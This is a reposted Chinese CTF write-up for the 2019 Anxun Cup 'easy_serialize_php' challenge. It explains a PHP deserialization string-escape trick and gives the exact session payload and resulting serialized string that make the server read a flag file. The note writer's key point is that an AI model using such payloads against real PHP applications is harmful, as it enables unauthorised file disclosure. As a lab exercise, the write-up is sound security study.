码上快乐

相关内容   简体   繁体

刷题记录:[安洵杯 2019]easy_serialize_php

本文转载自  查看原文  2020-01-14 01:39  723    web刷题

目录

刷题记录:[安洵杯 2019]easy_serialize_php

题目复现链接:https://buuoj.cn/challenges
参考链接:第二届安洵杯2019部分writeup

知识点

PHP反序列化

payload为_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
extract后覆盖了两个没用的属性,但是后面又强制加了一个我们不可控的img属性。这个payload的精妙之处就在于phpflag被替换为空后,$serialize_info的内容为
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
刚好把后面多余的img部分截断掉


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 [安洵杯 2019]easy_serialize_php [安洵杯 2019]easy_web 2019 安洵杯 Re 部分WP 刷题记录:[RCTF 2019]Nextphp 刷题记录:[SUCTF 2019]EasySQL 刷题记录:[SUCTF 2019]CheckIn 刷题记录:[SUCTF 2019]Pythonginx 刷题记录:[ASIS 2019]Unicorn shop 安洵杯 2019 | 吹着贝斯扫二维码 刷题记录:[网鼎杯 2020 玄武组]SSRFMe
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM